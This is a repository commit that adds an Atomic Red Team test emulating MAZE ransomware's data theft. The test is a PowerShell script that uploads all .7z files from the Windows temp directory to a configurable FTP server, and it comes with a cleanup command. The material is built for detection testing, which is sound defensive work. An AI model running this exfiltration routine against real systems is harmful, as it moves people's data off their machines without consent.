security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Create T1560.003 Test 1 (#1967)

Browse Source 
* Create T1560.003 test 1

* Add T1048.003 Test 6

* Delete T1560.003 (moved to T1048.003

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
Leo Verlod
2022-05-17 11:51:09 -05:00
committed by GitHub
parent 989bef284b
commit df1f3bf6ce
1 changed files with 42 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1048.003/T1048.003.yaml
+42
View File
@@ -116,3 +116,45 @@ atomic_tests:
description: SMTP server to use for email transportation
type: String
default: "127.0.0.1"
- name: MAZE FTP Upload
description: |
This test simulates MAZE's ransomware's ability to exfiltrate data via FTP.
Upon successful execution, all 7z files within the %windir%\temp directory will be uploaded to a remote FTP server.
Reference: https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents
supported_platforms:
- windows
input_arguments:
ftp_server:
description: FTP Server address
type: String
default: 127.0.0.1
username:
description: Username for FTP server login
type: String
default:
password:
description: Password for FTP server login
type: String
default:
executor:
command: |
$Dir_to_copy = "$env:windir\temp"
$ftp = "ftp://#{ftp_server}/"
$web_client = New-Object System.Net.WebClient
$web_client.Credentials = New-Object System.Net.NetworkCredential('#{username}', '#{password}')
if (test-connection -count 1 -computername "#{ftp_server}" -quiet)
{foreach($file in (dir $Dir_to_copy "*.7z"))
{echo "Uploading $file..."
$uri = New-Object System.Uri($ftp+$file.name)
$web_client.UploadFile($uri, $file.FullName)}}
else
{echo "FTP Server Unreachable. Please verify the server address in input args and try again."}
cleanup_command: |
$ftp = "ftp://#{ftp_server}/"
try {foreach ($file in (dir "$env:windir\temp" "*.7z"))
{$uri = New-Object System.Uri($ftp+$file.name)
$ftp_del = [System.Net.FtpWebRequest]::create($uri)
$ftp_del.Credentials = New-Object System.Net.NetworkCredential('#{username}','#{password}')
$ftp_del.Method = [System.Net.WebRequestMethods+Ftp]::DeleteFile
$ftp_del.GetResponse()}} catch{}
name: powershell